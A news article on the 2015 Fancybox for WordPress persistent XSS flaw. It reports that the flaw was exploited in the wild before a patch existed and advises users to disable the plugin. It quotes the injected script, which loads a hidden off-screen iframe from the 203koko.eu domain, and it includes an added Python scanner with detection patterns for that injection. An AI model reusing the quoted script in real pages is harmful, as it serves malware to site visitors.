Four hours ago, users seeking support on WordPress.org reported malware injected into their sites from an unknown source. The vulnerability allows a hidden iframe to be injected into the site that points to a “203koko” domain.

<script>/*<![CDATA[*/if(navigator.userAgent.match(/msie/i)){document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>');}/*]]>*/</script>
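As an added example (not code from the article, from Sucuri, or from the plugin), here is a small Python scanner that flags the injected pattern shown above in saved HTML source. The only indicator taken from the page is the 203koko domain; the sample HTML, the regular expressions and the "two of three parts" scoring threshold are constructed assumptions for illustration.

```python
import re

# Constructed sample: a page's HTML source carrying the injected script reported
# above, followed by an ordinary (benign) embedded iframe.
SAMPLE_HTML = """<html><head><title>Blog</title>
<script>/*<![CDATA[*/if(navigator.userAgent.match(/msie/i)){document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>');}/*]]>*/</script>
</head><body><p>Hello</p>
<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>
</body></html>"""

# Constructed clean page for comparison.
CLEAN_HTML = """<html><body><p>Nothing to see</p>
<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe></body></html>"""

# Indicator taken from the article's snippet; extend this tuple from your own logs.
KNOWN_BAD_HOSTS = ("203koko",)

# Structural traits of the injector: gated on the IE user agent, document.write()s an
# iframe, and hides it in a container pushed far off-screen. Each trait is matched
# separately so that altering one still leaves the others to score.
RE_IE_GATE = re.compile(r"navigator\.userAgent\.match\(\s*/msie/i\s*\)", re.I)
RE_DOC_WRITE_IFRAME = re.compile(r"document\.write\([^)]*<iframe", re.I | re.S)
RE_OFFSCREEN = re.compile(r"left\s*:\s*-\d{3,}px", re.I)
RE_IFRAME_SRC = re.compile(r"<iframe[^>]*\bsrc\s*=\s*[\"']([^\"']+)", re.I)
RE_SCRIPT = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)

TRAITS = (
    ("ie_gate", RE_IE_GATE),
    ("docwrite_iframe", RE_DOC_WRITE_IFRAME),
    ("offscreen", RE_OFFSCREEN),
)


def scan_html(html):
    """Return a list of (finding_type, detail) tuples for one HTML document."""
    findings = []
    # 1. Any iframe whose src mentions a known indicator domain.
    for src in RE_IFRAME_SRC.findall(html):
        if any(host in src.lower() for host in KNOWN_BAD_HOSTS):
            findings.append(("known_indicator", src))
    # 2. Any inline script showing at least two of the three injector traits
    #    (assumed threshold), which also catches the same technique on a new domain.
    for match in RE_SCRIPT.finditer(html):
        body = match.group(1)
        hits = [name for name, rx in TRAITS if rx.search(body)]
        if len(hits) >= 2:
            findings.append(("hidden_iframe_injector", ",".join(hits)))
    return findings


if __name__ == "__main__":
    for label, doc in (("sample", SAMPLE_HTML), ("clean", CLEAN_HTML)):
        print(label, scan_html(doc))
```

Because the injected script only writes the iframe when `navigator.userAgent` matches `msie`, a crawler that fetches the rendered DOM with a non-IE user agent never sees the iframe at all; run the scanner over the raw HTML source (or over the stored post content and plugin settings in the database) rather than over a rendered page.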

After working together to determine the plugins they have in common, users identified Fancybox for WordPress as the culprit. It has since been temporarily removed from the WordPress Plugins Directory, as it hasn’t been updated for two years and poses a security threat to users. The plugin has received more than half a million downloads and is likely in use on thousands of WordPress sites.

Konstantin Kovshenin and Gennady Kovshenin worked together to analyze sites from affected users to confirm the vulnerability. There is currently no patch, so users of the plugin are advised to turn it off immediately.

If you are running Fancybox for #WordPress turn it off now! It contains a persistent XSS #vulnerability #security #infosec — Gennady Kovshenin (@soulseekah) February 4, 2015

Analysts at Sucuri have confirmed via Website Firewall logs that the vulnerability is being actively exploited:

After some analysis, we can confirm that this plugin has a serious vulnerability that allows for malware (or any random script/content) to be added to the vulnerable site. Because it is currently unpatched, we will not disclose more information. What makes things worse is that it’s being actively exploited in the wild, leading to many compromised websites.

Users who have this plugin installed on their sites have no other option than to disable it, as no patch is available yet. The plugin’s author, José Pardilla, is aware of the issue and responded to an affected user five hours ago in the plugin’s forum on WordPress.org. A patch should be forthcoming.